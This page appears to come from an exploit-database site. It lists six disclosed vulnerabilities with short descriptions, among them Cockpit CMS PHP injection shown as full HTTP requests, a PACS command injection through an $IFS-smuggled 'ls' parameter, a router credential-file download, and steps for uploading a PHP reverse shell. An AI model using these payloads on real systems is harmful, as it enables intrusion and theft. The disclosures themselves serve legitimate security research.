header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Cockpit CMS 0.6.1 – Remote Code Execution

Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06. Exploit Login: POST /auth/check HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 52 Origin: https://example.com {"auth":{"user":"test'.phpinfo().'","password":"b"}} Exploit Password reset: POST /auth/requestreset HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/json; charset=UTF-8 Content-Length: 28 Origin: https://example.com {"user":"test'.phpinfo().'"}

Employee Record System 1.0 – Unrestricted File Upload to Remote Code Execution

An unrestricted file upload vulnerability in Employee Record System 1.0 allows an attacker to upload a malicious file, such as a webshell, to the server. This can be exploited to execute arbitrary code on the server, leading to remote code execution. The vulnerability exists in the 'Add Employee' page, where an attacker can upload a malicious file in the 'Upload Employee Photo' and 'Upload Employee ID' fields. The malicious file is then accessible via a direct URL, allowing an attacker to execute arbitrary code on the server.

ECSIMAGING PACS 6.21.5 – Remote code execution

ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter 'file' on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access. Command injection can be realized with the $IFS tricks : <url>/showfile.php?file=;ls$IFS-la$IFS/.

iBall-Baton WRA150N Rom-0 Backup – File Disclosure (Sensitive Information)

The iBall-Baton router version WRA150N is vulnerable to the Rom-0 exploit. The rom-0 is a file which contains the ADSL Login credentials. In the case of this router the access to this file is unusually not encrypted. The file can be accessed by typing the WiFi IP address in the browser followed by /rom-0 (For example - 192.168.1.1/rom-0). The rom-0 file will be downloaded. The file is obfuscated, however. It needs to be deobfuscated using online decryptors or by using threat 9's routersploit and using router/multi/rom-0 module.

Responsive E-Learning System 1.0 – Stored Cross Site Scripting

A stored cross-site scripting vulnerability exists in the Responsive E-Learning System 1.0, which allows an attacker to inject malicious JavaScript code into the application. By exploiting this vulnerability, an attacker can gain access to the application and execute malicious code on the victim's browser.

Responsive E-Learning System 1.0 – Unrestricted File Upload to RCE

An attacker can exploit the unrestricted file upload vulnerability in the Responsive E-Learning System 1.0 to gain remote code execution. The attacker can login to the application with admin credentials, click on Student or go to http://localhost/elearning/admin/student.php, click on Add Student and fill the required things. In image upload any php reverse shell. Then, the attacker can visit http://localhost/elearning/admin/uploads/ and select the uploaded PHP web shell.

Recent Exploits: